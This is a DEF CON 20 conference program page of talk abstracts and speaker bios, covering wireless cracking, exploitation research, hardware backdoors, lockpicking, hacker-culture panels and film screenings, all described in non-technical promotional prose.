Welcome & Making the

DEF CON 20 Badge

More info to come.





return to top

DEF CON Documentary Trailer

As you may have heard, in honor of our 20th anniversary, we have a DEF CON Documentary in the making by none other than Jason Scott of textfiles.com! At the beginning of this hour he will give you a quick sneak peek of the film and maybe discuss a few juicy tidbits!





Before, During, and After

When Gail Thackeray first spoke at DEF CON 1 there was no world wide web, state sponsored computer warfare was the stuff of science fiction, and international mafias had yet to become major players in computer crime.Internationally known for her role in Operation Sundevil, the former prosecuting attorney will discuss the changes in the computer security legal landscape since she first spoke at DEF CON. She will also discuss the evolution of the relationship between the computer security researcher community and law enforcement and government.



Twenty years ago, Dead Addict practically begged Gail Thackeray to appear at DEF CON, even though she was actively prosecuting several of his close friends. Since then the government (law enforcement, military, and intelligence community) has actively participated in DEF CON; to the point where we’ve been given the moniker ‘FED CON’. Dead Addict will discuss the evolving relationship between government, the hacker community, and the civil liberties community. While obviously at odds with each other in some areas, there is also shared ground between these groups. This year he was happy to be able invite Gail again, this time not begging as much, and thankfully she isn’t prosecuting any of his friends.



Following their talk, Gail and Dead Addict will give a special introduction to our Special Guest Speaker [REDACTED], [REDACTED] of the [REDACTED] and [REDACTED].



Gail Thackeray is a former Assistant Attorney General and Special Counsel recently retired from the Arizona Attorney General's Office. Her career prosecuting electronic crimes included the investigation and prosecution of early infrastructure attacks on a telephone network and a power company, as well as numerous fraud, cyberstalking and intrusion crimes. She participated in the nationwide Secret Service hacker investigation known as "Operation Sundevil" and attended the first Defcon Conference. She currently works at the Arizona Counter Terrorism Information Center as a computer forensic examiner. She has a B.A. from Vassar College, a J.D. from Syracuse University, and earned the CFCE forensics certification from the International Association of Computer Investigative Specialists (IACIS).



20 years ago, Dead Addict helped organize the first DEF CON. He has been part of the staff ever since. In the years since DEF CON began, DA has worked for companies large and small, helping secure mobile platforms, operating systems, and financial infrastructures. In addition to being given the opportunity to speak speak at DEF CON, Shmoocon, Black Hat, Notacon and others, he constantly feels privileged at the company he has been able to keep. He is currently a wandering rōnin and aspiring curmudgeon that can be reached at da@defcon.org or daddict@gmail.com.

return to top

DC 101 Thursday Talks

Cracking Wireless encryption keys is a fundamental capability that should be in every penetration tester's skill set. This talk will walk you through the basic steps necessary to break Wireless Encryption Protocol (WEP) and steps to perform dictionary and brute force attacks against Wi-Fi Protected Access (WPA & WPA2).



DaKahuna works as a Systems Engineer for a small defense contractor in the Washington DC metro area. By day he works with large government agencies reviewing network and security architectures, reviewing information assurance and information security policies and guidance, and advising on matters of policy and governance. By night he enjoys snooping the airways be it the amateur radio bands or his neighbors wireless networks. He is a father of two, 24 year Navy veteran and holder of an amateur radio Extra Class license.



return to top

Putting up a flag and asking for help on the Internet is not for the faint of heart. When you simply want to get started with information security, hacking or just playing around with the vulnerabilities of computer systems, asking the right question to the right person is a crap shoot. Tired of being on the outside looking in? This 101 talk will help you get your feet wet! It will provide you the basic knowledge required when starting out in the InfoSec scene. Afraid to ask someone what the best NMap toggles are? Can't even get your metasploit running? Having trouble decoding your tcpdumps? We can help! Spend 50 min. with us and jump start the next 50 years of your life!



Ripshy is a long time tinkerer who has been a part of the DEF CON community for the past 10 years, attending his first con at the Jail bait age of 15. He has worked in various roles touching multiple points of the info sec rainbow, and is currently working with Sony PlayStation doing magical things with little more than curiosity and a keyboard. Ripshy is an OG member of the Vegas 2.0 crew, a founding member of GayHackers, and works as a goon in the DEF CON NOC.



Hackajar has been involved in DEF CON in one form or another for over a decade. He's a founding member of Vegas 2.0, a Contest Goon, and the brains behind "The Summit". He currently heads a Silicon Valley Hacker Space and various security shenanigans.

return to top

YOU: are part of the problem. You should count yourself among the ranks of the unprepared. You are under-educated and fooling yourself. You are sheep, you just don’t know any better… but ignorance is no excuse. You know that much.



Navigating the world of Social Engineering is often portrayed with the image of “Jedi mind-tricks” and labeled with terms like “The Art of Deception”… These are all just ploys to convey mysticism, sell books and add value to a skill based on common sense, perception and the ability to think further than the end of your own nose.



It’s time to remove the wool and learn what Social Engineering is and how it works. Welcome to a crash course in the oldest CLI…. Bring a helmet.



Siviak: A contributor to DEF CON for 14+ years and a geek for over 30, Siviak is considered by some as a trusted* (*citation needed) authority in the area of Social Engineering, considered by others to be a complete asshole and considered by himself, often.



Siviak has talked with, listened to, pontificated at, entertained, debated, challenged, hoodwinked, and exchanged booze with a great number of us over the years. He is one of the originating voices behind the Lackey Program, undisputed ruler of the Scavenger Hunt, winner of more black badges than any other attendee in history and a proud member of 23b.



return to top

DEF CON 101

DC101 is the Alpha to the closing ceremonies' Omega. It's the place to go to learn about the many facets of Con and to begin your Defconian Adventure. Whether you're a n00b or a long time attendee, DC101 can start you on the path toward maximizing your DEF CON Experiences.



HighWiz █████ █████ █████ ███ ████, ███████████ ██████████ ████. ██████ ████████ ████ ██ ████ ████████ ██ ██████████ ██████ █████████. ██ █████████ █████ ███████ ████ █████████ ███████. ███████ ███████ ███ ██ ███ █████████ ████ █████████ █████ █████████. ███████ ██████ █████, █████████ ██ █████████ ███, ████████ ██ █████. ███ ███ █████ █████ █████ █████████ ███████. █████████ ███████ ██████ ██████. ███████ ██ ██████ ████, ██ ████████ █████. ███████ ██ ██████████ █████. █████████ █████████, █████ ███ ████████ █████████, █████ █████ ███████ ██████, ██ ████████████ ██████.



Pyr0 is the asshole who oversees the Contests and Events at DEF CON. He's been attending since DEF CON 6 and a goon since DEF CON 7. One of those 3 0 3 peoples and also rolls deep with Security Tribe. Loves good vodka, smart girls, explosives, and big black . . . guns. Has the ability to tell a man to go to hell so that he looks forward to the trip. ALSO:DONGS



Roamer is the Senior Goon in charge of the Vendor Area. He has been on DEF CON staff since DEF CON 8. He was the founder of the DEF CON WarDriving contest the first 4 years of it's existence and has also run the slogan contest in the past. Roamer is the lead guitarist in the Goon Band, Recognize (despite what you may read in Gm1's bio). Although having no actual skills his ability to out-drink virtually every Goon and attendee under the table has gained him massive prominence in the scene and elevated him to the lofty station you see him in today.



Lockheed is the Sr. Goon in charge of the DEF CON Network Operations Group since DEF CON 4. Professionally, Lock has over 25 years of experience in the technology field. He's had jobs ranging from lowly tech writer, mainframe operator, product engineer, product marketing manager, and is currently Sr Director in charge of the Global IT Group for Sony PlayStation Worldwide Studios, managing staff across the globe. He's been in the video game industry for almost 10 years now.



AlxRogan was born and raised in the Oil and Gas industry, and has worked (off and on) there since 1995. In his work experience, he has consulted for energy generating companies, health care providers, US and local government, and education/research institutions. He is currently the Information Security Architect for a mid-size oil and gas company in Houston. He also enjoys mopery.



LoST: With a background in mathematics and robotics LosT spends his free time between calculating how to take over the world and building the robots to accomplish it. Deciding to teach others how to create robot overlords, he created the Hardware Hacking Village for the DEF CON community with Russ in an effort to get more people involved with hardware. Fearing competition LosT devised the Mystery Challenge to confuse and confound those who would rise up against him- eventually becoming the creator of the badges to that same end. Really he just wants to juggle and read books these days, or watch MST3K with Tom.



Flipper is the new guy on the panel. DEF CON 19 was his first DEF CON, and he was on the team that went on to victory in the Scavenger Hunt. Last year he applied his experience from robotics competitions to survive several days of sleepless insanity. He is back again this year to talk about the whole DEF CON experience from the perspective of a newcomer. His day job finds him being an expert in underwater robotics.

Twitter: @NickFlipper

Flipper on G+



return to top

Have you ever wondered how you can translate your mad skillz into an actual job? Does coming to DEF CON even help you get there? Four members of the DEF CON staff will astound you with the stories of how they took their experiences at DEF CON and turned them into the jobs of their dreams. Despite using their DEF CON experiences to obtain these jobs, they represent four completely different industries: Government, Energy, Health Care, and the Video Game Industry in a variety of different job functions. Learn from their experience and find out what they look for (from the community?) when they need to fill positions in their respective industries.



Roamer is the Senior Goon in charge of the Vendor Area. He has been on DEF CON staff since DEF CON 8. He was the founder of the DEF CON WarDriving contest the first 4 years of it's existence and has also run the slogan contest in the past. Roamer is the lead guitarist in the Goon Band, Recognize (despite what you may read in Gm1's bio). Although having no actual skills his ability to out-drink virtually every Goon and attendee under the table has gained him massive prominence in the scene and elevated him to the lofty station you see him in today.



Lockheed is the Sr. Goon in charge of the DEF CON Network Operations Group since DEF CON 4. Professionally, Lock has over 25 years of experience in the technology field. He's had jobs ranging from lowly tech writer, mainframe operator, product engineer, product marketing manager, and is currently Sr Director in charge of the Global IT Group for Sony PlayStation Worldwide Studios, managing staff across the globe. He's been in the video game industry for almost 10 years now.



AlxRogan was born and raised in the Oil and Gas industry, and has worked (off and on) there since 1995. In his work experience, he has consulted for energy generating companies, health care providers, US and local government, and education/research institutions. He is currently the Information Security Architect for a mid-size oil and gas company in Houston.





return to top

Fuck a bunch of skiddie tools acquired from bobo forums. One does not have to be a master to write their own shit. Yoda said it best get off your dick and write yourself some Python (Just don't show it to Highwiz he might bite it). Also always remember to stay in the the wizards good graces or you will find yourself publicly humiliated. You can come to this talk and find out how to be humiliated publicly but also: learn some python from a hackers perspective. Oh yea: Dongs, Schlongs, and Turds



Terrence "tuna" Gareau If drinking and getting fat was a job Terrence “tuna” Gareau would be a rich and happy person. He has spent his years growing up with a terminal on his dong. There is nothing more satisfying to this poor bloke then hacking something to find a new purpose or use for it. This love for hacking has gone so far that he does not know how to interact with humans or the opposite sex and has left him a 26 year old virgin.





return to top

Since this is DC101, I've got some things I want to get off my chest- a brief overview of 'foundational' hacker knowledge that I personally believe all hackers should have or would want- from subculture references to numerical oddities, this will be a meat space core dump of an ADD-OCD hacker. (ADD-OCD: I'm constantly changing what I'm completely obsessed about.) Topics will include mathematics, linguistics, programming, hardware, DEF CON, robotics, and more. A veritable cornucopia of fun. Or not.



LoST: With a background in mathematics and robotics LosT spends his free time between calculating how to take over the world and building the robots to accomplish it. Deciding to teach others how to create robot overlords, he created the Hardware Hacking Village for the DEF CON community with Russ in an effort to get more people involved with hardware. Fearing competition LosT devised the Mystery Challenge to confuse and confound those who would rise up against him- eventually becoming the creator of the badges to that same end. Really he just wants to juggle and read books these days, or watch MST3K with Tom.





return to top

Everyone relies on their locks to keep things secure. From front doors to filing cabinets, they give us the sense of security that no one else can get inside without the proper key. However, in reality, most locks can be picked trivially without any evidence of exploitation. You will learn how and why lockpicking works as well as what manufacturers have done to protect against such shenanigans.



Dr. Tran is a security professional in Switzerland by day, but some say he’s a super-secret agent by night. He’s been tinkering and taking apart technology since childhood, but hasn’t necessary figured out how to reassemble them. When Robert is not wrenching on motor vehicles or traveling the world, he’s picking locks. He’s been an active member of TOOOL for over 3 years and has taught at conferences including Shmoocon, CarolinaCon, NotaCon, Security BSides, QuahogCon, HOPE, & DEF CON.





return to top

Movie Night With The Dark Tangent: "Code2600" + Q&A With the Director

DEF CON is happy to announce Code 2600 will be showing at DEF CON 20! We will be the first hacker con to have the film shown and we are pretty excited about it. The filmmaker will be present and doing a Q & A after the screening! Check out code2600.com for more info!



About the film:



CODE 2600 documents the rise of the Information Technology Age as told through the events and people who helped build and manipulate it. The film explores the impact this new connectivity has on our ability to remain human while maintaining our personal privacy and security. As we struggle to comprehend the wide-spanning socio-technical fallout caused by data collection and social networks, our modern culture is trapped in an undercurrent of cyber-attacks, identity theft and privacy invasion. Both enlightening and disturbing, CODE 2600 is a provocative wake-up call for a society caught in the grips of a global technology takeover.



The Cast:



Bruce Schneier,

Chief Security Technology Officer, BT



Jeff Moss,

Founder Def Con and Black Hat



Marcus Ranum,

Chief Security Officer, Tenable Security



Jennifer Granick,

Civil Liberties Director, EFF



Dr. Bob Lash,

Original Member of the Homebrew Computer Club



Eric Michaud,

Founder, Pumping Station One



Gideon Lenkey,

Security, CEO RA Security Systems



Lorrie Cranor,

Cylab, Carnegie Mellon University



Phil Lapsley,

Phone Phreaking Expert, Author



Robert Vamosi,

Computer Security Journalist, Author



Wallace Wang,

Author, "Steal This Computer Book"



Gideon Lenkey,

Co-Founder, Ra Security Systems





return to top

Movie Night With The Dark Tangent: "Reboot" + Q&A With the Filmmakers and Actors

We are very excited to announce an Exclusive Sneak Preview screening of the film Reboot at DEF CON 20! Here is a peek at the premise from an article on the film:



"Set within a dystopian world that is a collision between technology and humanity, "Reboot" touches upon many of the current social and political concerns that arise from becoming more and more intertwined with the virtual.



In contemporary Los Angeles, a young female hacker (Stat) awakens from unconsciousness to find an iPhone glued to her hand and a mysterious countdown ticking away on the display. Suffering from head trauma, and with little recollection of who she is or what is happening, Stat races against time to figure out what the code means, and what unknown event the pending zero-hour will bring."



We are also excited that the filmmakers and lead cast members will be on hand at DEF CON for a Q&A session along with the screening! We'll have more info as this solidifies.



If you are looking for a fun gaming challenge, Reboot has a cool alternate reality game in which you can participate as well! Find more info at http://www.rebootfilm.com/scoreboard.





return to top

Movie Night with The Dark Tangent:

"We Are Legion: The Story

of the Hacktivists"

"We Are Legion: The Story of the Hacktivists” is a documentary that takes us inside the world of Anonymous, the radical “hacktivist” collective that has redefined civil disobedience for the digital age. The film explores the historical roots of early hacktivist groups like Cult of the Dead Cow and Electronic Disturbance Theater and then follows Anonymous from 4chan to a full-blown movement with a global reach, one of the most transformative of our time.



We might even get lucky and have some cast and crew in attendance for a short Q&A!





return to top

Movie Night With The Dark Tangent: "21" + Q&A With "MIT Mike" Aponte

Join us for a screening of the hit movie "21" and stick around for a Q&A session with "MIT Mike" Aponte, the real-life inspiration for the character "Jason Fisher".



"MIT Mike" Aponte Mike Aponte is a world-renowned blackjack player, gaming consultant and professional speaker. Mike was the leader of the MIT Blackjack Team, a high stakes card-counting team that legally won millions at 21 using mathematics and an ingenious approach. Mike was one of the main characters in the New York Times bestseller, Bringing Down the House, which inspired the major motion picture, 21.



Drawing on 20 years of professional blackjack experience, Mike teach players how to turn 21 into a lucrative money maker. Blackjack is unique because unlike other casino games, it is a true game of skill. The decisions you make actually determine whether you will win or lose over the long run. The beauty of blackjack is that for every playing decision there is one and only one correct play, and for every betting decision there is one and only one optimal bet.



Professional blackjack is both an art and science. In addition to learning the optimal strategies you must also develop the skills in order to apply the knowledge effectively. Mike teaches his clients how to develop a high skill level using the same training methods and techniques he used when he managed the MIT Team. If you're tired of losing to the casinos or are entrepreneurial minded and seeking a new and exciting skill, Mike can help you turn blackjack into a winning investment.



Accomplishments:

In addition to being one of the MIT Blackjack Team’s most successful players, Mike was also responsible for recruiting, player development and strategic analysis. In 2004, Mike won the first World Series of Blackjack championship competing against the best blackjack players in the world. Mike speaks professionally for corporations and universities and also consults on the mathematics of gaming





return to top

Shared Values, Shared Responsibility

We as a global society are extremely vulnerable and at risk for a catastrophic cyber event. Global society needs the best and brightest to help secure our most valued resources in cyberspace: our intellectual property, our critical infrastructure and our privacy. DEF CON has an important place in computer security. It taps into a broad range of talent and provides an unprecedented diversity of experiences and expertise to solve tough problems. The hacker community and USG cyber community share some core values: we both see the Internet as an immensely positive force; we both believe information increases in value by sharing; we both respect protection of privacy and civil liberties; we both believe in the need for oversight that fosters innovation, doesn’t pick winners and losers, and retains freedom and flexibility; we both oppose malicious and criminal behavior. We should build on this common ground because we have a shared responsibility to secure cyberspace.



General Keith B. Alexander is the Commander, U.S. Cyber Command (USCYBERCOM) and Director, National Security Agency/Chief, Central Security Service (NSA/CSS). As Commander, USCYBERCOM, he oversees planning, coordinating and conducting operations and defense of DoD computer networks. As Director, NSA/Chief, CSS, he oversees a DoD agency with national foreign intelligence, combat support, and U.S. national security information system protection responsibilities. GEN Alexander holds a B.S. from the U.S. Military Academy, a M.S. in Business Administration from Boston University, a M.S. in Systems Technology (Electronic Warfare) and a M.S. in Physics from the Naval Post Graduate School, and a M.S. in National Security Strategy from the National Defense University.

return to top

Owning Bad Guys {And Mafia} With Javascript Botnets

Man in the middle attacks are still one of the most powerful techniques for owning machines. In this talk MITM schemas in anonymous services are going to be discussed. Then attendees will see how easily a botnet using javascript can be created to analyze that kind of connections and some of the actions people behind those services are doing... in real. It promises to be funny.



Chema Alonso is a Security researcher with Informatica64, a Madrid-based security firm. Chema holds respective Computer Science and System Engineering degrees from Rey Juan Carlos University and Universidad Politècnica de Madrid. During his more than eight years as a security professional, he has consistently been recognized as a Microsoft Most Valuable Professional (MVP). Chema is a frequent speaker at industry events (Microsoft Technet / Security Tour, AseguraIT) and has been invited to present at information security conferences worldwide including Yahoo! Security Week, Black Hat Briefings, ShmooCON, DeepSec, HackCON, Ekoparty and RootedCon - He is a frequent contributor on several technical magazines in Spain, where he is involved with state-of-the-art attack and defense mechanisms, web security, general ethical hacking techniques and FOCA.

Twitter: @chemaalonso

http://www.elladodelmal.com

www.informatica64.com



Manu has been working in all security areas since he got into Informatica64. He is a security pentester, a developer coding in projects like FOCA and a very good security research in areas such as Connection String Parameter Pollution Attacks or malware. He has the honor of being the man behind some of the most powerful "C# spaghetti lines" of FOCA.

return to top

The Darknet of Things, Building Sensor Networks That Do Your Bidding

The Internet of Things... It is coming, wearing hardware that communicates across the Internet is starting to become a reality, chips are getting smaller, as a society we are connected all the time... Building these devices is easier then we thought, putting them onto a network that is ours... EVEN BETTER! Come experience the Darknet of Things. Learn what we built, how we built it, and why. Learn how to get involved with a new community project, see what some of the DEF CON groups have been working on. Most importantly, learn how you can connect to the Darknet of Things.



Anch - Just a lowly hacker out in Oregon, POC for DC503, Designer of the Network, and happily connected to the matrix.

Twitter: @boneheadsanon

http://www.dcgdark.net



Omega - Hardware hacker extraordinare. Member of DC503, Designer of things, and thinks he should have taken the RED pill.

return to top

Drones!

Thanks to the plummeting cost of powerful motion sensors like those found in smartphones, the technology to create military-class autopilots is available to all. Over the past five years, the DIY Drones community has created a series of open source unmanned aerial vehicles (UAV), from fully-autonomous planes, helicopters, quadcopters, hexacopters, rovers and more, which cost just a few hundred dollars -- less than 1% the cost of equivalent military drones. As a result there are now more than 10,000 of them in use -- more than the US Military. As DIY drones go mainstream, what are the practical applications that will emerge, and the legal, ethical and economic implications? How does open source change the regulatory aspects of drones? And will the rise of "personal drones" have a similar social impact as "personal computers" did?







Chris Anderson is the Editor in Chief of Wired. He is the author of the New York Times bestsellers The Long Tail and FREE: The Future of a Radical Price, and the forthcoming Makers: The New Industrial Revolution. He is also founder of 3D Robotics, an open source robotics company.



return to top

<ghz or bust: DEF CON

Wifi is cool and so is cellular, but the real fun stuff happens below the GHz line. Medical systems, mfg plant/industrial systems, cell phones, power systems, it's all in there!



atlas and some friends set out to turn pink girltech toys into power-systems-attack tools. Through several turns and changes, the cc1111usb project was born, specifically to make attacking these systems easier for all of you. With a $50 usb dongle, the world of ISM sub-GHz is literally at your fingertips.



New and improved! If you missed it at shmoocon, here's your chance to see the intro to this fun new world. If you caught it at shmoo, come to the talk and prove your <ghz prowess and wirelessly hack a special pink girl's toy target!



atlas is a doer of stuff. Inspired by the illustrious sk0d0, egged on by invisigoth of kenshoto, atlas has done a lot of said 'stuff' and lived to talk about it. Whether he's breaking out of virtual machines, breaking into banks, or breaking into power systems, atlas is always entertaining, educational and fun.

Twitter: @at1as

return to top

Blind XSS

This talk will announce the release and demonstrate the xss.io toolkit. xss.io is a platform to help ease cross-site scripting (xss) exploitation and specifically for this talk identification of blind xss vectors. Think drag and drop exploits post xss vuln identification. For blind xss, xss.io is a callback and hook manager for intel collected by executed and non-executed but accessed payloads.



Adam "EvilPacket" Baldwin Adam Baldwin has over 10+ years of mostly self-taught computer security experience and currently is the Chief Security Officer at &yet. He at one time possessed a GCIA and if his CPE's are up to date should still have a CISSP. Prior to starting at &yet, Adam operated a security consultancy, nGenuity and worked for Symantec. Adam is a minor contributor to the W3AF project, creator of the DVCS pillaging toolkit, helmet: the security header middleware for node.js, and has previously spoken at DEF CON, Toorcon, Toorcamp, Djangcon, and JSconf.

Twitter: @adam_baldwin

http://evilpacket.net

return to top

Should the Wall of Sheep Be Illegal? A Debate Over Whether and How Open WiFi Sniffing Should Be Regulated

Prompted by the Google Street View WiFi sniffing scandal, the question of whether and how the law regulates interception of unencrypted wireless communications has become a hot topic in the courts, in the halls of the FCC, on Capitol Hill, and in the security community. Are open WiFi communications protected by federal wiretap law, unprotected, or some strange mix of the two? (Surprise: it may be the last one, so you'll want to come learn the line between what's probably illegal sniffing and what's probably not.)

More importantly, what *should* the law be? Should the privacy of those who use WiFi without encryption be protected by law, or would regulating open WiFi sniffing pose too great a danger to security research and wireless innovation, not to mention DEF CON traditions like the Wall of Sheep? Do we need to protect the sheep from the hackers, or the hackers from the law, or can we do both at the same time? Join legal expert Kevin Bankston and technical expert Matt Blaze as they square off in a debate to answer these questions, moderated by Jennifer Granick. (Surprise: the lawyer is the one arguing for regulation.)



Kevin Bankston is Senior Counsel and Director of the Free Expression Project at the Center for Democracy & Technology, a Washington, DC-based non-profit organization dedicated to promoting democratic values and constitutional liberties in the digital age. Prior to joining CDT in February 2012, he was a Senior Staff Attorney for the Electronic Frontier Foundation (EFF) specializing in free speech and privacy law with a focus on government surveillance, Internet privacy, and location privacy. At EFF, he regularly litigated issues surrounding location privacy and electronic surveillance, and was a lead counsel in EFF’s lawsuits against the National Security Agency and AT&T challenging the legality of the NSA’s warrantless wiretapping program. From 2003-05, he was EFF's Equal Justice Works/Bruce J. Ennis Fellow, studying the impact of post-9/11 anti-terrorism surveillance initiatives on online privacy and free expression. Before joining EFF, he was the Justice William J. Brennan First Amendment Fellow for the American Civil Liberties Union, where he litigated Internet-related free speech cases. He received his J.D. in 2001 from the University of Southern California and his undergraduate degree from the University of Texas.

Twitter: @kevinbankston

http://www.cdt.org



Matt Blaze directs the Distributed Systems Lab at the University of Pennsylvania, where he teaches hackers to be scientists and scientists to be hackers.

Twitter: @mattblaze

http://www.crypto.com



Jennifer Granick is the General Counsel of Worldstar, LLC. Prior to joining WorldStarHipHop, Granick was an attorney at ZwillGen PLLC from 2010-2012 and the Civil Liberties Director at the Electronic Frontier Foundation from 2007-2010. Previously, Granick served as the Executive Director of the Center for Internet and Society at Stanford Law School where she was a lecturer in law. She founded and directed the Law School's Cyberlaw Clinic where she supervised students in working on some of the most important cyberlaw cases that took place during her tenure. She is best known for her work with intellectual property law, free speech, privacy, and other things relating to computer security, and has represented several high profile hackers.

Twitter: @granick

http://www.granick.com



return to top

Cryptohaze Cloud Cracking

Bitweasil goes through the latest developments in the Cryptohaze GPU based password cracking suite. WebTables is a new rainbow table technology that eliminates the need to download rainbow tables before using them, and the new Cryptohaze Multiforcer is an open source, GPLv2, network enabled platform for password cracking that is easy to extend with new algorithms for specific targets. The Cryptohaze Multiforcer supports CUDA, OpenCL, and CPU code (SSE, AVX, etc). All of this is aimed at either the pentester who can't spray hashes to the internet, or the hacker who would rather not broadcast what she obtained to pastebin scrapers..



Bitweasil Bitweasil is the primary developer on the open source Cryptohaze tool suite, which implements network-clustered GPU accelerated password cracking (both brute force & rainbow tables). He has been working with CUDA for over 4 years (since the first public release on an 8800GTX), OpenCL for the past 2 years, and enjoys SSE2 as well. Bitweasil also rescues ferrets.

Twitter:@Bitweasil

http://www.cryptohaze.com

return to top

Overwriting the Exception Handling Cache PointerDwarf Oriented Programming

This presentation describes a new technique for abusing the DWARF exception handling architecture used by the GCC tool chain. This technique can be used to exploit vulnerabilities in programs compiled with or linked to exception-enabled parts. Exception handling information is stored in bytecode format, executed by a virtual machine during the course of exception unwinding and handling. We show how a malicious attacker could gain control of those structures and inject bytecode for malicious purposes. This virtual machine is actually Turing-complete, which means that it can be made to run arbitrary attacker logic.



Rodrigo Rubira Branco (BSDaemon) is the Director of Vulnerability & Malware Research at Qualys. In 2011 he was honored as one of the top contributors to Adobe Vulnerabilities in the past 12 months. Previously, as the Chief Security Research at Check Point he founded the Vulnerability Discovery Team (VDT) and released dozens of vulnerabilities in many important software. Previous to that, he worked as Senior Vulnerability Researcher in COSEINC, as Principal Security Researcher at Scanit and as Staff Software Engineer in the IBM Advanced Linux Response Team (ALRT) also working in the IBM Toolchain (Debugging) Team for PowerPC Architecture. He is a member of the RISE Security Group and is the organizer of Hackers to Hackers Conference (H2HC), the oldest security research conference in Latin America. Accepted speaker in lots of security and open-source related events as H2HC, HITB, XCon, VNSecurity, OLS, DEF CON, Hackito, Ekoparty, Troopers and others.



James Oakley came to computer programming by way of microcontroller programming. He enjoys hands-on work with low level systems. His interests include computer graphics, digital electronics, security, and operating systems. In his unprofessional time he enjoys backpacking, science fiction, and designing games. He graduated from the Computer Science program at Dartmouth College.



Sergey Bratus is a Research Assistant Professor of Computer Science at Dartmouth College. He tries to help fellow academics to understand the value and relevance of hacker research. He enjoys wireless and wired network hacking, kernel rootkits and hardening patches, and spoke on various topics at Shmoocon, Toorcon, DEF CON, and Black Hat. He has a Ph.D. in Mathematics from Northeastern University, and worked at BBN Technologies on natural language processing research before coming to Dartmouth.

Twitter: @sergeybratus

return to top

Exploit Archaeology: Raiders of the Lost Payphones

Payphones. Remember those? They used to be a cornerstone of modern civilation, available at every street corner, gas station, or any general place of commerce. For decades, hackers and phone phreaks crowded around them as an altar to high technology and a means to "reach out and touch someone".



Fast forward to today, most people have mobile phones. Payphones installed decades earlier are now more of a memorial to a time long gone by. Covered with grime and graffitti, forgotten, relegated to the realm of drug dealers and other undesirables. But they're still around, and they're more vulnerable than ever.



This talk will review modern hacking techniques applied to retro hardware. We'll cover owning payphones and how they can be retrofitted with new technologies to turn them into the ultimate low profile hacking platform to compromise your organizations network. There will be demos of payphone hacking on stage, as well as using the payphone to intercept voice phone traffic. We'll also reveal a new tool to automate the exploitation of payphones and relate how (like with all forms of archaelogoy) learning about old platforms can help us secure modern architecture.



Joshua Brashars Joshua Brashars is a penetration tester and a member of DC949. He prefers to break things instead of make them.



Joshua has presented at several notable security conferences, including Toorcon San Diego, Toorcon Seattle, Thotcon, Baythreat and HOPE. Joshua has also contributed to several titles with Syngress Publishing.

Twitter: @savant42

return to top

Hardware Backdooring is Practical

This presentation will demonstrate that permanent backdooring of hardware is practical. We have built a generic proof of concept malware for the intel architecture, Rakshasa, capable of infecting more than a hundred of different motherboards. The first net effect of Rakshasa is to disable NX permanently and remove SMM related fixes from the BIOS, resulting in permanent lowering of the security of the backdoored computer, even after complete earasing of hard disks and reinstallation of a new operating system. We shall also demonstrate that preexisting work on MBR subvertions such as bootkiting and preboot authentication software bruteforce can be embedded in Rakshasa with little effort. More over, Rakshasa is built on top of free software, including the Coreboot project, meaning that most of its source code is already public. This presentation will take a deep dive into Coreboot and hardware components such as the BIOS, CMOS and PIC embedded on the motherboard, before detailing the inner workings of Rakshasa and demo its capabilities. It is hoped to raise awareness of the security community regarding the dangers associated with non open source firmwares shipped with any computer and question their integrity. This shall also result in upgrading the best practices for forensics and post intrusion analysis by including the afore mentioned firmwares as part of their scope of work.



Jonathan Brossard is a security research engineer. Born in France, he's been living in Brazil and India, before currently working in Australia. With about 15 years of practice of assembly, he is specialised in low level security, from raw sockets to cryptography and memory corruption bugs. He is currently working as CEO and security consultant at the Toucan System security company. His clients count some of the biggest Defense and Financial Institutions worldwide. Jonathan is also the co-organiser of the Hackito Ergo Sum conference (HES) in France.

Twitter: @endrazine

Facebook: toucansystem

return to top

DIY Electric Car

Electric Vehicles are an exciting area of developing technology entering the mainstream market. Every major manufacturer is working on new hybrid and electric vehicles but prices will be high and options few for years to come.



As with many industries, a DIY approach can yield similar results for much less cost, while creating something truly unique.



This talk will explore the possibilities and procedures involved in creating your own electric vehicle. Topics addressed will include the whys and hows, with an emphasis on the options available to tailor your conversion to match your time, budget, and performance needs.



Dave Brown is an IT Security Consultant with Booz Allen Hamilton. In his free time he tries to build stuff, and is particularly interested in alternative energy. In 2010 he converted a ’74 VW Beetle to run on electricity, improving performance and eliminating the need to gas up.



return to top

Tenacious Diggity: Skinny Dippin' in a Sea of Bing

All brand new tool additions to the Google Hacking Diggity Project - The Next Generation Search Engine Hacking Arsenal. As always, all tools are free for download and use.

When last we saw our heroes, the Diggity Duo had demonstrated how search engine hacking could be used to take over someone’s Amazon cloud in less than 30 seconds, build out an attack profile of the Chinese government’s external networks, and even download all of an organization’s Internet facing documents and mine them for passwords and secrets. Google and Bing were forced to hug it out, as their services were seamlessly combined to identify which of the most popular websites on the Internet were unwittingly being used as malware distribution platforms against their own end-users.



Now, we've traveled through space and time, my friend, to rock this house again...



True to form, the legendary duo have toiled night and day in the studio (a one room apartment with no air conditioning) to bring you an entirely new search engine hacking tool arsenal that’s packed with so much tiger blood and awesome-sauce, that it’s banned on 6 continents. Many of these new Diggity tools are also fueled by the power of the cloud and provide you with vulnerability data faster and easier than ever thanks to the convenience of mobile applications.Just a few highlights of new tools to be unveiled are:



* AlertDiggityDB – For several years, we’ve collected vulnerability details and sensitive information disclosures from thousands of real-time RSS feeds setup to monitor Google, Bing, SHODAN, and various other search engines. We consolidated this information into a single database, the AlertDiggityDB, forming the largest consolidated repository of live vulnerabilities on the Internet. Now it’s available to you.



* Diggity Dashboard – An executive dashboard of all of our vulnerability data collected from search engines. Customize charts and graphs to create tailored views of the data, giving you the insight necessary to secure your own systems. This web portal provides users with direct access to the most current version of the AlertDiggityDB.



* Bing Hacking Database (BHDB) 2.0 – Exploiting recent API changes and undocumented features within Bing, we’ve been able to completely overcome the previous Bing hacking limitations to create an entirely new BHDB that will make Bing hacking just as effective as Google hacking (if not more so) for uncovering vulnerabilities and data leaks on the web. This also will include an entirely new SharePoint Bing Hacking database, containing attack strings targeting Microsoft SharePoint deployments via Bing.



* NotInMyBackYardDiggity – Don’t be the last to know if LulzSec or Anonymous post data dumps of your company’s passwords on PasteBin.com, or if a reckless employee shares an Excel spreadsheet with all of your customer data on a public website. This tool leverages both Google and Bing, and comes with pre-built queries that make it easy for users to find sensitive data leaks related to their organizations that exist on 3rd party sites, such as PasteBin, YouTube, and Twitter. Uncover data leaks in documents on popular cloud storage sites like Dropbox, Microsoft SkyDrive, and Google Docs. A must have for organizations that have sensitive data leaks on domains they don’t control or operate.



